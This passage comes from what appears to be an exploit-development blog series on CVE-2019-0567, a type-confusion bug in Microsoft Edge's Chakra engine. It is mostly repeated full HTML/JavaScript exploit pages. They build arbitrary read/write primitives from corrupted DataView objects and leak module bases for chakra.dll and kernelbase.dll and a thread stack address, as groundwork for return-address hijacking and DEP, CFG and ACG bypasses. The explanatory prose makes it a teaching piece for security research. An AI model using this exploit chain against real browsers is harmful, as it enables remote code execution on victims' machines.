    opt(o, o, obj);     // Instead of supplying 0x1234, we are supplying our obj

    // Corrupt obj->auxSlots with the address of the first DataView object
    o.c = dataview1;

    // Corrupt dataview1->buffer with the address of the second DataView object
    obj.h = dataview2;

    // dataview1 methods act on dataview2 object
    // Since vftable is located from 0x0 - 0x8 in dataview2, we can simply just retrieve it without going through our read64() function
    vtableLo = dataview1.getUint32(0x0, true);
    vtableHigh = dataview1.getUint32(0x4, true);

    // Extract dataview2->type (located 0x8 - 0x10) so we can follow the chain of pointers to leak a stack address via...
    // ... type->javascriptLibrary->scriptContext->threadContext
    typeLo = dataview1.getUint32(0x8, true);
    typeHigh = dataview1.getUint32(0xC, true);

    // Print update
    document.write("[+] DataView object 2 leaked vtable from chakra.dll: 0x" + hex(vtableHigh) + hex(vtableLo));
    document.write("<br>");

    // Store the base of chakra.dll
    chakraLo = vtableLo - 0x5d0bf8;
    chakraHigh = vtableHigh;

    // Print update
    document.write("[+] chakra.dll base address: 0x" + hex(chakraHigh) + hex(chakraLo));
    document.write("<br>");
}
</script>
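The script above prints each pointer as `hex(high) + hex(low)` and computes the base with `vtableLo - 0x5d0bf8`, which only touches the low 32 bits. As a hedged aside (not part of the original exploit), here is a minimal sketch of the same arithmetic on the full 64-bit value using BigInt, with zero-padded output. BigInt may not be available in the legacy Edge build targeted here, so treat this as a way to double-check leaked values offline (for example in Node). The helper names `toU64`, `fromU64`, and `hex64` and the leaked value are hypothetical.

```javascript
// Combine two 32-bit halves (as read through the DataView primitives) into one BigInt.
function toU64(lo, hi) {
    return (BigInt(hi >>> 0) << 32n) | BigInt(lo >>> 0);
}

// Split a 64-bit BigInt back into [lo, hi] 32-bit halves, matching the exploit's layout.
function fromU64(value) {
    return [Number(value & 0xffffffffn), Number((value >> 32n) & 0xffffffffn)];
}

// Zero-pad to 16 hex digits so a low half such as 0x0005d0bf is not printed as "5d0bf".
function hex64(value) {
    return "0x" + value.toString(16).padStart(16, "0");
}

// Offset measured in WinDbg in the text; the leaked halves below are made up.
const VFTABLE_OFFSET = 0x5d0bf8n;
const leakedVftable = toU64(0x1a5d0bf8, 0x00007fff);
const chakraBase = leakedVftable - VFTABLE_OFFSET;
console.log("chakra.dll base: " + hex64(chakraBase));
```

Working on the full 64-bit value also handles the rare case where the subtraction has to borrow from the high half, which `vtableLo - 0x5d0bf8` would not.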

After computing the base address of chakra.dll, the next thing we need to do, as shown in part two, is leak an import address table (IAT) entry that points to kernel32.dll (in this case kernelbase.dll, which implements much of the functionality exported by kernel32.dll).

Using the same debugging session, or a new one if you prefer (following the aforementioned steps to locate the content process), we can locate the IAT for chakra.dll with the !dh command.

If we dive a bit deeper into the IAT, we can see there are several pointers into kernelbase.dll, which contains many of the important APIs, such as VirtualProtect, that we need to bypass DEP and ACG. Specifically, for our exploit, we will extract the pointer to kernelbase!DuplicateHandle as our kernelbase.dll leak, as we will need this API in the future for our ACG bypass.

What this means is that we can use our read primitive to read what chakra_base+0x5ee2b8 points to (which is a pointer into kernelbase.dll). We can then compute the base address of kernelbase.dll by subtracting the offset of DuplicateHandle (determined in the debugger as the distance between DuplicateHandle and the base of kernelbase.dll) from the leaked pointer.

We now know that DuplicateHandle is 0x18de0 bytes away from kernelbase.dll’s base address. Armed with this information, we can update exploit.html as follows and detonate it.

<button onclick="main()">Click me to exploit CVE-2019-0567!</button>

<script>
// CVE-2019-0567: Microsoft Edge Type Confusion
// Author: Connor McGarr (@33y0re)

// Creating object obj
// Properties are stored via auxSlots since properties weren't declared inline
obj = {}
obj.a = 1;
obj.b = 2;
obj.c = 3;
obj.d = 4;
obj.e = 5;
obj.f = 6;
obj.g = 7;
obj.h = 8;
obj.i = 9;
obj.j = 10;

// Create two DataView objects
dataview1 = new DataView(new ArrayBuffer(0x100));
dataview2 = new DataView(new ArrayBuffer(0x100));

// Function to convert to hex for memory addresses
function hex(x) {
    return x.toString(16);
}

// Arbitrary read function
function read64(lo, hi) {
    dataview1.setUint32(0x38, lo, true);        // DataView+0x38 = dataview2->buffer
    dataview1.setUint32(0x3C, hi, true);        // We set this to the memory address we want to read from (4 bytes at a time: e.g. 0x38 and 0x3C)

    // Instead of returning a 64-bit value here, we will create a 32-bit typed array and return the entire array
    // Write primitive requires breaking the 64-bit address up into 2 32-bit values so this allows us an easy way to do this
    var arrayRead = new Uint32Array(0x10);
    arrayRead[0] = dataview2.getInt32(0x0, true);   // 4-byte arbitrary read
    arrayRead[1] = dataview2.getInt32(0x4, true);   // 4-byte arbitrary read

    // Return the array
    return arrayRead;
}

// Arbitrary write function
function write64(lo, hi, valLo, valHi) {
    dataview1.setUint32(0x38, lo, true);        // DataView+0x38 = dataview2->buffer
    dataview1.setUint32(0x3C, hi, true);        // We set this to the memory address we want to write to (4 bytes at a time: e.g. 0x38 and 0x3C)

    // Perform the write with our 64-bit value (broken into two 4 bytes values, because of JavaScript)
    dataview2.setUint32(0x0, valLo, true);       // 4-byte arbitrary write
    dataview2.setUint32(0x4, valHi, true);       // 4-byte arbitrary write
}

// Function used to set prototype on tmp object to cause type transition on o object
function opt(o, proto, value) {
    o.b = 1;

    let tmp = {__proto__: proto};

    o.a = value;
}

// main function
function main() {
    for (let i = 0; i < 2000; i++) {
        let o = {a: 1, b: 2};
        opt(o, {}, {});
    }

    let o = {a: 1, b: 2};

    opt(o, o, obj);     // Instead of supplying 0x1234, we are supplying our obj

    // Corrupt obj->auxSlots with the address of the first DataView object
    o.c = dataview1;

    // Corrupt dataview1->buffer with the address of the second DataView object
    obj.h = dataview2;

    // dataview1 methods act on dataview2 object
    // Since vftable is located from 0x0 - 0x8 in dataview2, we can simply just retrieve it without going through our read64() function
    vtableLo = dataview1.getUint32(0x0, true);
    vtableHigh = dataview1.getUint32(0x4, true);

    // Extract dataview2->type (located 0x8 - 0x10) so we can follow the chain of pointers to leak a stack address via...
    // ... type->javascriptLibrary->scriptContext->threadContext
    typeLo = dataview1.getUint32(0x8, true);
    typeHigh = dataview1.getUint32(0xC, true);

    // Print update
    document.write("[+] DataView object 2 leaked vtable from chakra.dll: 0x" + hex(vtableHigh) + hex(vtableLo));
    document.write("<br>");

    // Store the base of chakra.dll
    chakraLo = vtableLo - 0x5d0bf8;
    chakraHigh = vtableHigh;

    // Print update
    document.write("[+] chakra.dll base address: 0x" + hex(chakraHigh) + hex(chakraLo));
    document.write("<br>");

    // Leak a pointer to kernelbase.dll (KERNELBASE!DuplicateHandle) from the IAT of chakra.dll
    // chakra+0x5ee2b8 points to KERNELBASE!DuplicateHandle
    kernelbaseLeak = read64(chakraLo+0x5ee2b8, chakraHigh);

    // KERNELBASE!DuplicateHandle is 0x18de0 away from kernelbase.dll's base address
    kernelbaseLo = kernelbaseLeak[0]-0x18de0;
    kernelbaseHigh = kernelbaseLeak[1];

    // Store the pointer to KERNELBASE!DuplicateHandle (needed for our ACG bypass) into a more aptly named variable
    var duplicateHandle = new Uint32Array(0x4);
    duplicateHandle[0] = kernelbaseLeak[0];
    duplicateHandle[1] = kernelbaseLeak[1];

    // Print update
    document.write("[+] kernelbase.dll base address: 0x" + hex(kernelbaseHigh) + hex(kernelbaseLo));
    document.write("<br>");
}
</script>
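The IAT leak in the script above boils down to two steps: read the qword stored at chakra_base + 0x5ee2b8, then subtract 0x18de0 from it. The sketch below simulates this offline, assuming a Map as a stand-in for process memory. `readQword` is a hypothetical stand-in for the exploit’s `read64()` (it takes one BigInt address instead of two halves), and both base addresses are invented; only the two offsets come from the text.

```javascript
// Offsets from the text; the two base addresses are hypothetical.
const IAT_DUPLICATEHANDLE_OFFSET = 0x5ee2b8n;  // chakra.dll IAT slot holding KERNELBASE!DuplicateHandle
const DUPLICATEHANDLE_OFFSET = 0x18de0n;       // KERNELBASE!DuplicateHandle - kernelbase.dll base
const chakraBase = 0x00007fff1a000000n;        // hypothetical result of the vftable leak
const kernelbaseBase = 0x00007fff2b000000n;    // hypothetical; the value we want to recover

// Simulated process memory: one qword at the IAT slot pointing into kernelbase.dll.
const memory = new Map([
    [chakraBase + IAT_DUPLICATEHANDLE_OFFSET, kernelbaseBase + DUPLICATEHANDLE_OFFSET],
]);

// Hypothetical stand-in for the exploit's read64() primitive.
function readQword(address) {
    if (!memory.has(address)) {
        throw new Error("access violation at 0x" + address.toString(16));
    }
    return memory.get(address);
}

const duplicateHandle = readQword(chakraBase + IAT_DUPLICATEHANDLE_OFFSET);
const recoveredBase = duplicateHandle - DUPLICATEHANDLE_OFFSET;
console.log("kernelbase.dll base: 0x" + recoveredBase.toString(16));
```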

We are now almost done porting our exploit primitives to Edge from ChakraCore. As we can recall from our ChakraCore exploit, the last thing we need to do now is leak a stack address/the stack in order to bypass CFG for control-flow hijacking and code execution.

Recall that this information derives from this Google Project Zero issue. As we can recall with our ChakraCore exploit, we computed these offsets in WinDbg and determined that ChakraCore leveraged slightly different offsets. However, since we are now targeting Edge, we can update the offsets to those mentioned by Ivan Fratric in this issue.

However, even though the type->scriptContext->threadContext offsets will be the ones mentioned in the Project Zero issue, the stack address offset is slightly different. We will go ahead and debug this with alert() statements.

We know we have to leak a type pointer (which we already have stored in exploit.html the same way as part two of this blog series) in order to leak a stack address. Let’s update our exploit.html with a few items to aid in our debugging for leaking a stack address.

<button onclick="main()">Click me to exploit CVE-2019-0567!</button>

<script>
// CVE-2019-0567: Microsoft Edge Type Confusion
// Author: Connor McGarr (@33y0re)

// Creating object obj
// Properties are stored via auxSlots since properties weren't declared inline
obj = {}
obj.a = 1;
obj.b = 2;
obj.c = 3;
obj.d = 4;
obj.e = 5;
obj.f = 6;
obj.g = 7;
obj.h = 8;
obj.i = 9;
obj.j = 10;

// Create two DataView objects
dataview1 = new DataView(new ArrayBuffer(0x100));
dataview2 = new DataView(new ArrayBuffer(0x100));

// Function to convert to hex for memory addresses
function hex(x) {
    return x.toString(16);
}

// Arbitrary read function
function read64(lo, hi) {
    dataview1.setUint32(0x38, lo, true);        // DataView+0x38 = dataview2->buffer
    dataview1.setUint32(0x3C, hi, true);        // We set this to the memory address we want to read from (4 bytes at a time: e.g. 0x38 and 0x3C)

    // Instead of returning a 64-bit value here, we will create a 32-bit typed array and return the entire array
    // Write primitive requires breaking the 64-bit address up into 2 32-bit values so this allows us an easy way to do this
    var arrayRead = new Uint32Array(0x10);
    arrayRead[0] = dataview2.getInt32(0x0, true);   // 4-byte arbitrary read
    arrayRead[1] = dataview2.getInt32(0x4, true);   // 4-byte arbitrary read

    // Return the array
    return arrayRead;
}

// Arbitrary write function
function write64(lo, hi, valLo, valHi) {
    dataview1.setUint32(0x38, lo, true);        // DataView+0x38 = dataview2->buffer
    dataview1.setUint32(0x3C, hi, true);        // We set this to the memory address we want to write to (4 bytes at a time: e.g. 0x38 and 0x3C)

    // Perform the write with our 64-bit value (broken into two 4 bytes values, because of JavaScript)
    dataview2.setUint32(0x0, valLo, true);       // 4-byte arbitrary write
    dataview2.setUint32(0x4, valHi, true);       // 4-byte arbitrary write
}

// Function used to set prototype on tmp object to cause type transition on o object
function opt(o, proto, value) {
    o.b = 1;

    let tmp = {__proto__: proto};

    o.a = value;
}

// main function
function main() {
    for (let i = 0; i < 2000; i++) {
        let o = {a: 1, b: 2};
        opt(o, {}, {});
    }

    let o = {a: 1, b: 2};

    opt(o, o, obj);     // Instead of supplying 0x1234, we are supplying our obj

    // Corrupt obj->auxSlots with the address of the first DataView object
    o.c = dataview1;

    // Corrupt dataview1->buffer with the address of the second DataView object
    obj.h = dataview2;

    // dataview1 methods act on dataview2 object
    // Since vftable is located from 0x0 - 0x8 in dataview2, we can simply just retrieve it without going through our read64() function
    vtableLo = dataview1.getUint32(0x0, true);
    vtableHigh = dataview1.getUint32(0x4, true);

    // Extract dataview2->type (located 0x8 - 0x10) so we can follow the chain of pointers to leak a stack address via...
    // ... type->javascriptLibrary->scriptContext->threadContext
    typeLo = dataview1.getUint32(0x8, true);
    typeHigh = dataview1.getUint32(0xC, true);

    // Print update
    document.write("[+] DataView object 2 leaked vtable from chakra.dll: 0x" + hex(vtableHigh) + hex(vtableLo));
    document.write("<br>");

    // Store the base of chakra.dll
    chakraLo = vtableLo - 0x5d0bf8;
    chakraHigh = vtableHigh;

    // Print update
    document.write("[+] chakra.dll base address: 0x" + hex(chakraHigh) + hex(chakraLo));
    document.write("<br>");

    // Leak a pointer to kernelbase.dll (KERNELBASE!DuplicateHandle) from the IAT of chakra.dll
    // chakra+0x5ee2b8 points to KERNELBASE!DuplicateHandle
    kernelbaseLeak = read64(chakraLo+0x5ee2b8, chakraHigh);

    // KERNELBASE!DuplicateHandle is 0x18de0 away from kernelbase.dll's base address
    kernelbaseLo = kernelbaseLeak[0]-0x18de0;
    kernelbaseHigh = kernelbaseLeak[1];

    // Store the pointer to KERNELBASE!DuplicateHandle (needed for our ACG bypass) into a more aptly named variable
    var duplicateHandle = new Uint32Array(0x4);
    duplicateHandle[0] = kernelbaseLeak[0];
    duplicateHandle[1] = kernelbaseLeak[1];

    // Print update
    document.write("[+] kernelbase.dll base address: 0x" + hex(kernelbaseHigh) + hex(kernelbaseLo));
    document.write("<br>");

    // ---------------------------------------------------------------------------------------------

    // Print update with our type pointer
    document.write("[+] type pointer: 0x" + hex(typeHigh) + hex(typeLo));
    document.write("<br>");

    // Spawn an alert dialogue to pause execution
    alert("DEBUG");
}
</script>

As we can see, we have added a document.write() call to print out the address of our type pointer (from which we will leak a stack address), and we have also added an alert() call to create an “alert” dialogue. JavaScript objects live in temporary virtual memory (i.e. memory that is not backed by an image on disk, unlike a 0x7fff address belonging to a loaded DLL), so the address of an object is only “consistent” for the duration of the process. Think of this in terms of ASLR: on Windows, when you reboot the system, you can expect images to be loaded at different addresses. The longevity of the addresses used for JavaScript objects is similar, except that they change on a “per-script” basis rather than a per-boot basis (“per-script basis” is a term I made up to represent the fact that the address of a JavaScript object changes each time the JavaScript code is run). This is the reason for the document.write() and alert() calls. The document.write() call gives us the address of our type object, and the alert() dialogue acts, in essence, like a breakpoint: it pauses execution of the JavaScript, HTML, and CSS code until the dialogue has been dealt with. In other words, the JavaScript code cannot finish executing until the dialogue is dismissed, so all of the JavaScript code stays loaded in the content process in the meantime. This allows us to examine the type pointer before it goes out of scope. We will use this same “setup” (e.g. alert() calls) to our advantage in debugging in the future.

If we run our exploit two separate times, we can confirm our theory that the type pointer changes address each time the JavaScript executes.

Now, for “real” this time, let’s open up exploit.html in Edge and click the Click me to exploit CVE-2019-0567 button. This should bring up our “alert” dialogue.

As we can see, the type pointer is located at 0x1ca40d69100 (note you won’t be able to use copy and paste with the dialogue available, so you will have to manually type this value). Now that we know the address of the type pointer, we can use Process Hacker to locate our content process.

As we can see, the content process which uses the most RAM is PID 6464. This is our content process, where our exploit is currently executing (although paused). We now can use WinDbg to attach to the process and examine the memory contents of 0x1ca40d69100.

After inspecting the memory contents, we can confirm that this is a valid address - meaning our type pointer hasn’t gone out of scope! Although a bit of an arduous process, this is how we can successfully debug Edge for our exploit development!

Using the Project Zero issue as a guide, and leveraging the process outlined in part two of this blog series, we can walk various pointers within this structure to fetch a stack address!

The Google Project Zero issue explains that we essentially can just walk the type pointer to extract a ScriptContext structure which, in turn, contains ThreadContext. The ThreadContext structure is responsible, as we have seen, for storing various stack addresses. Here are the offsets:

  1. type + 0x8 = JavaScriptLibrary
  2. JavaScriptLibrary + 0x430 = ScriptContext
  3. ScriptContext + 0x5c0 = ThreadContext

In our case, the ThreadContext structure is located at 0x1ca3d72a000.
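The three offsets above describe a plain pointer chase: each structure stores a pointer to the next one at a fixed offset. The following sketch simulates that walk offline. It assumes a Map as a stand-in for process memory and a hypothetical `readQword` helper in place of `read64()`; the type pointer and ThreadContext values are the ones from this debugging session, while the JavaScriptLibrary and ScriptContext addresses are made up.

```javascript
// Offsets listed above for this Edge build.
const TYPE_TO_LIBRARY = 0x8n;
const LIBRARY_TO_SCRIPTCONTEXT = 0x430n;
const SCRIPTCONTEXT_TO_THREADCONTEXT = 0x5c0n;

// type and threadContext are the values seen in the debugging session;
// the two intermediate addresses are made up for the simulation.
const type = 0x1ca40d69100n;
const javascriptLibrary = 0x1ca40d80000n;   // hypothetical
const scriptContext = 0x1ca3d700000n;       // hypothetical
const threadContext = 0x1ca3d72a000n;

// Simulated memory: each field holds a pointer to the next structure in the chain.
const memory = new Map([
    [type + TYPE_TO_LIBRARY, javascriptLibrary],
    [javascriptLibrary + LIBRARY_TO_SCRIPTCONTEXT, scriptContext],
    [scriptContext + SCRIPTCONTEXT_TO_THREADCONTEXT, threadContext],
]);

// Hypothetical stand-in for read64(): unmapped addresses behave like an access violation.
function readQword(address) {
    if (!memory.has(address)) {
        throw new Error("access violation at 0x" + address.toString(16));
    }
    return memory.get(address);
}

// type->javascriptLibrary->scriptContext->threadContext
function walkToThreadContext(typePtr) {
    const library = readQword(typePtr + TYPE_TO_LIBRARY);
    const context = readQword(library + LIBRARY_TO_SCRIPTCONTEXT);
    return readQword(context + SCRIPTCONTEXT_TO_THREADCONTEXT);
}

console.log("ThreadContext: 0x" + walkToThreadContext(type).toString(16));
```

If any offset is wrong for the target build, the walk lands on an unrelated address, which is why each hop is worth confirming in WinDbg first.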

Previously, we leaked the stackLimitForCurrentThread member of ThreadContext, which essentially gave us the stack limit for the exploiting thread. However, take a look at this address within Edge (located at ThreadContext + 0x4f0).

If we try to examine the memory contents of this address, we can see they are not committed to memory. This obviously means this address doesn’t fall within the bounds of the TEB’s known stack address(es) for our current thread.

As we can recall from part two, this was also the case. However, in ChakraCore, we could consistently compute the offset from the leaked stackLimitForCurrentThread between exploit attempts. Let’s compute the distance from our leaked stackLimitForCurrentThread to the actual stack limit from the TEB.

Here, at this point in the exploit, the leaked stack address is 0x1cf0000 bytes away from the actual stack limit we leaked via the TEB. Let’s exit out of WinDbg and re-run our exploit, while also leaking our stack address within WinDbg.

Our type pointer is located at 0x157acb19100.

After attaching WinDbg to Edge and walking the type object, we can see our leaked stack address via stackLimitForCurrentThread.

As we can see above, when computing the offset, our offset has changed to 0x1c90000 bytes away from the actual stack limit. This poses a problem for us, as we cannot reliably compute the offset to the stack limit. Since the stack limit saved in the ThreadContext structure (stackLimitForCurrentThread) is not committed to memory, we will actually get an access violation when attempting to dereference this memory. This means our exploit would be killed, so we also can’t “guess” the offset if we want our exploit to be reliable.
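To put a number on that variance, the two measured offsets can simply be subtracted. With only two samples this is a lower bound on how far the offset can move, not a full characterization; the 4 KB page size is the standard x64 Windows page size.

```javascript
// Offsets between stackLimitForCurrentThread and the TEB's stack limit in the two runs above.
const firstRun = 0x1cf0000;
const secondRun = 0x1c90000;
const PAGE_SIZE = 0x1000; // 4 KB pages

const drift = Math.abs(firstRun - secondRun);
console.log("drift: 0x" + drift.toString(16) + " bytes (" + (drift / PAGE_SIZE) + " pages)");
```

Any fixed guess would have to land on a committed page despite the offset shifting by dozens of pages between runs, and a miss is an access violation.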

Before I pose the solution, I wanted to touch on something I first tried. Within the ThreadContext structure, there is a global variable named globalListFirst. This seems to be a linked-list within a ThreadContext structure which is used to track other instances of a ThreadContext structure. At an offset of 0x10 within this list (consistently, I found, in every attempt I made) there is actually a pointer to the heap.

Since it is possible via stackLimitForCurrentThread to at least leak an address around the current stack limit (with the upper 32-bits being the same across all stack addresses), and although there is a degree of variance between the offset from stackLimitForCurrentThread and the actual current stack limit (around 0x1cX0000 bytes as we saw between our two stack leak attempts), I used my knowledge of the heap to do the following:

  1. Leak the heap from chakra!ThreadContext::globalListFirst
  2. Using the read primitive, scan the heap for any stack addresses that are greater than the leaked stack address from stackLimitForCurrentThread
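The heap-scanning idea above can be sketched as a loop that reads qwords and keeps anything that looks like a stack address above the stackLimitForCurrentThread leak. This is an illustration under stated assumptions, not the code I used: “looks like a stack address” is approximated as “same upper 32 bits as the leak and a larger value” (mirroring the observation that the upper 32 bits are shared across stack addresses), `scanHeapForStackPointers` is a hypothetical name, and the simulated heap contents are invented apart from 0x1c2affaf60, which is borrowed from the stack address shown later in this post.

```javascript
// Scan `length` bytes starting at heapStart, one qword at a time, and collect values that
// share the leaked value's upper 32 bits and lie above it (a heuristic for "stack address").
function scanHeapForStackPointers(readQword, heapStart, length, leakedStackLimit) {
    const leakHigh = leakedStackLimit >> 32n;
    const found = [];
    for (let off = 0n; off < length; off += 8n) {
        const value = readQword(heapStart + off);
        if ((value >> 32n) === leakHigh && value > leakedStackLimit) {
            found.push({ at: heapStart + off, value: value });
        }
    }
    return found;
}

// Simulated heap with made-up contents.
const heapStart = 0x1ca00000000n;
const leakedLimit = 0x1c00100000n;          // hypothetical stackLimitForCurrentThread leak
const heap = new Map([
    [heapStart + 0x10n, 0x1c2affaf60n],      // looks like a stack address above the leak
    [heapStart + 0x18n, 0x7fff1a000000n],    // module address, different upper half
    [heapStart + 0x20n, 0x1c00000010n],      // same upper half but below the leak
]);
const readQword = addr => (heap.has(addr) ? heap.get(addr) : 0n);

const hits = scanHeapForStackPointers(readQword, heapStart, 0x40n, leakedLimit);
hits.forEach(h => console.log("0x" + h.at.toString(16) + " -> 0x" + h.value.toString(16)));
```

As described next, a hit is only a candidate: the stack it points into may already be decommitted.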

I found that I could leak a stack address from the heap about 50-60% of the time. From there, the stack address leaked from the heap was committed to memory only about 50% of the time; otherwise, I would get an access violation when dereferencing it. Although I was only succeeding in about half of the exploit attempts, this is significantly better than trying to “guess” the offset from stackLimitForCurrentThread. However, after I got frustrated with this, I saw there was a much easier approach.

The reason I didn’t take this approach earlier is that stackLimitForCurrentThread seemed to come from a thread stack that was no longer in memory. This can be seen below.

Looking at the above image, we can see only one active thread has a stack address that is anywhere near stackLimitForCurrentThread. However, if we look at the TEB for that single thread, the stack address we are leaking doesn’t fall anywhere within its range. This was disheartening for me, as I assumed any stack address I leaked from this ThreadContext structure was from a thread that was no longer active and whose stack address space had, thus, been decommitted. However, in the Google Project Zero issue, stackLimitForCurrentThread wasn’t the item leaked; it was leafInterpreterFrame. Since I had enjoyed success with stackLimitForCurrentThread in part two of this blog series, it didn’t cross my mind until much later to investigate this specific member.

If we take a look at the ThreadContext structure, we can see that there is a stack address at offset 0x8f0.

In fact, we can see two stack addresses. Both of them are committed to memory, as well!

If we compare this to Ivan’s findings in the Project Zero issue, we can see that he leaks two stack addresses at offsets 0x8a0 and 0x8a8, just as we have leaked them at 0x8f0 and 0x8f8. We can therefore infer that these are the same stack addresses from the leafInterpreterFrame member of ThreadContext, and that we are likely on a different version of Windows than Ivan, which likely means a different version of Edge and, thus, the slight difference in offsets. For our exploit, you can choose either of these addresses. I opted for ThreadContext + 0x8f8.

Additionally, if we look at the address itself (0x1c2affaf60), we can see that this address doesn’t reside within the current thread’s stack.

However, we can clearly see that not only is this address committed to memory, it is within the stack bounds (base and limit) recorded in another thread’s TEB (note that the below diagram is confusing because the columns are unaligned. We are outlining the stack base and limit).

This means we can reliably locate a stack address for a currently executing thread! It is perfectly okay if we end up hijacking a return address within another thread: we have the ability to read and write anywhere within the process space, and because the “private” address space Windows provides is per-process, we can hijack any thread in the current process. In essence, it is perfectly valid to corrupt a return address on another thread to gain code execution. The “lower level details” are abstracted away from us when it comes to this concept, because regardless of which return address we overwrite, the function owning that stack frame will eventually have to return control flow somewhere in memory. Since threads are constantly executing functions, we can expect that at some point the thread we are dealing with will be scheduled and will return through our corrupted return address. If this makes no sense, do not worry. Our concept hasn’t changed in terms of overwriting a return address (be it in the current thread or another thread). From a foundational perspective, nothing changes in terms of our stack leak and return address corruption between this blog post and part two of this blog series.

With that being said, here is how our exploit now looks with our stack leak.

<button onclick="main()">Click me to exploit CVE-2019-0567!</button>

<script>
// CVE-2019-0567: Microsoft Edge Type Confusion
// Author: Connor McGarr (@33y0re)

// Creating object obj
// Properties are stored via auxSlots since properties weren't declared inline
obj = {}
obj.a = 1;
obj.b = 2;
obj.c = 3;
obj.d = 4;
obj.e = 5;
obj.f = 6;
obj.g = 7;
obj.h = 8;
obj.i = 9;
obj.j = 10;

// Create two DataView objects
dataview1 = new DataView(new ArrayBuffer(0x100));
dataview2 = new DataView(new ArrayBuffer(0x100));

// Function to convert to hex for memory addresses
function hex(x) {
    return x.toString(16);
}

// Arbitrary read function
function read64(lo, hi) {
    dataview1.setUint32(0x38, lo, true);        // DataView+0x38 = dataview2->buffer
    dataview1.setUint32(0x3C, hi, true);        // We set this to the memory address we want to read from (4 bytes at a time: e.g. 0x38 and 0x3C)

    // Instead of returning a 64-bit value here, we will create a 32-bit typed array and return the entire array
    // Write primitive requires breaking the 64-bit address up into 2 32-bit values so this allows us an easy way to do this
    var arrayRead = new Uint32Array(0x10);
    arrayRead[0] = dataview2.getInt32(0x0, true);   // 4-byte arbitrary read
    arrayRead[1] = dataview2.getInt32(0x4, true);   // 4-byte arbitrary read

    // Return the array
    return arrayRead;
}

// Arbitrary write function
function write64(lo, hi, valLo, valHi) {
    dataview1.setUint32(0x38, lo, true);        // DataView+0x38 = dataview2->buffer
    dataview1.setUint32(0x3C, hi, true);        // We set this to the memory address we want to write to (4 bytes at a time: e.g. 0x38 and 0x3C)

    // Perform the write with our 64-bit value (broken into two 4 bytes values, because of JavaScript)
    dataview2.setUint32(0x0, valLo, true);       // 4-byte arbitrary write
    dataview2.setUint32(0x4, valHi, true);       // 4-byte arbitrary write
}

// Function used to set prototype on tmp object to cause type transition on o object
function opt(o, proto, value) {
    o.b = 1;

    let tmp = {__proto__: proto};

    o.a = value;
}

// main function
function main() {
    for (let i = 0; i < 2000; i++) {
        let o = {a: 1, b: 2};
        opt(o, {}, {});
    }

    let o = {a: 1, b: 2};

    opt(o, o, obj);     // Instead of supplying 0x1234, we are supplying our obj

    // Corrupt obj->auxSlots with the address of the first DataView object
    o.c = dataview1;

    // Corrupt dataview1->buffer with the address of the second DataView object
    obj.h = dataview2;

    // dataview1 methods act on dataview2 object
    // Since vftable is located from 0x0 - 0x8 in dataview2, we can simply just retrieve it without going through our read64() function
    vtableLo = dataview1.getUint32(0x0, true);
    vtableHigh = dataview1.getUint32(0x4, true);

    // Extract dataview2->type (located 0x8 - 0x10) so we can follow the chain of pointers to leak a stack address via...
    // ... type->javascriptLibrary->scriptContext->threadContext
    typeLo = dataview1.getUint32(0x8, true);
    typeHigh = dataview1.getUint32(0xC, true);

    // Print update
    document.write("[+] DataView object 2 leaked vtable from chakra.dll: 0x" + hex(vtableHigh) + hex(vtableLo));
    document.write("<br>");

    // Store the base of chakra.dll
    chakraLo = vtableLo - 0x5d0bf8;
    chakraHigh = vtableHigh;

    // Print update
    document.write("[+] chakra.dll base address: 0x" + hex(chakraHigh) + hex(chakraLo));
    document.write("<br>");

    // Leak a pointer to kernelbase.dll (KERNELBASE!DuplicateHandle) from the IAT of chakra.dll
    // chakra+0x5ee2b8 points to KERNELBASE!DuplicateHandle
    kernelbaseLeak = read64(chakraLo+0x5ee2b8, chakraHigh);

    // KERNELBASE!DuplicateHandle is 0x18de0 away from kernelbase.dll's base address
    kernelbaseLo = kernelbaseLeak[0]-0x18de0;
    kernelbaseHigh = kernelbaseLeak[1];

    // Store the pointer to KERNELBASE!DuplicateHandle (needed for our ACG bypass) into a more aptly named variable
    var duplicateHandle = new Uint32Array(0x4);
    duplicateHandle[0] = kernelbaseLeak[0];
    duplicateHandle[1] = kernelbaseLeak[1];

    // Print update
    document.write("[+] kernelbase.dll base address: 0x" + hex(kernelbaseHigh) + hex(kernelbaseLo));
    document.write("<br>");

    // Print update with our type pointer
    document.write("[+] type pointer: 0x" + hex(typeHigh) + hex(typeLo));
    document.write("<br>");

    // Arbitrary read to get the javascriptLibrary pointer (offset of 0x8 from type)
    javascriptLibrary = read64(typeLo+8, typeHigh);

    // Arbitrary read to get the scriptContext pointer (offset 0x430 from javascriptLibrary)
    scriptContext = read64(javascriptLibrary[0]+0x430, javascriptLibrary[1]);

    // Arbitrary read to get the threadContext pointer (offset 0x5c0 from scriptContext)
    threadContext = read64(scriptContext[0]+0x5c0, scriptContext[1]);

    // Leak a stack address from threadContext at offset 0x8f8 (offset 0x8f0 holds another usable one)
    // https://bugs.chromium.org/p/project-zero/issues/detail?id=1360
    // Offsets are slightly different from the Project Zero issue (0x8f0 and 0x8f8 instead of 0x8a0 and 0x8a8)
    stackleakPointer = read64(threadContext[0]+0x8f8, threadContext[1]);

    // Print update
    document.write("[+] Leaked stack address! type->javascriptLibrary->scriptContext->threadContext->leafInterpreterFrame: 0x" + hex(stackleakPointer[1]) + hex(stackleakPointer[0]));
    document.write("<br>");
}
</script>

After running our exploit, we can see that we have successfully leaked a stack address.

From our experimenting earlier, the offsets between the leaked stack addresses and the actual stack bounds vary between script runs. Because of this, there is no way for us to compute the base and limit of the stack from our leaked address, so we will forgo computing the stack limit. Instead, we will scan the stack for return addresses starting from the address we have currently leaked. Let’s recall a previous image outlining the stack limit of the thread where we leaked a stack address at the time of the leak.

As we can see, we are towards the base of the stack. Since the stack grows “downwards” (the stack base is located at a higher address than the stack limit), we will do our scanning in “reverse” order compared to part two. For our purposes, we will scan the stack by starting at our leaked stack address and traversing backwards towards the stack limit (the lowest address the stack can grow to).

We already outlined in part two of this blog post the methodology I used in terms of leaking a return address to corrupt. As mentioned then, the process is as follows:

  1. Traverse the stack using read primitive
  2. Print out all contents of the stack that are possible to read
  3. Look for anything starting with 0x7fff, meaning an address from a loaded module like chakra.dll
  4. Disassemble the address to see if it is an actual return address

While omitting much of the code from our full exploit, a stack scan used just to print out the contents of the stack (so we can spot return addresses) would look like this:

(...)truncated(...)

// Leak a pointer to a pointer on the stack from threadContext at offset 0x8f0
// https://bugs.chromium.org/p/project-zero/issues/detail?id=1360
// Offsets are slightly different (0x8f0 and 0x8f8 to leak stack addresses)
stackleakPointer = read64(threadContext[0]+0x8f8, threadContext[1]);

// Print update
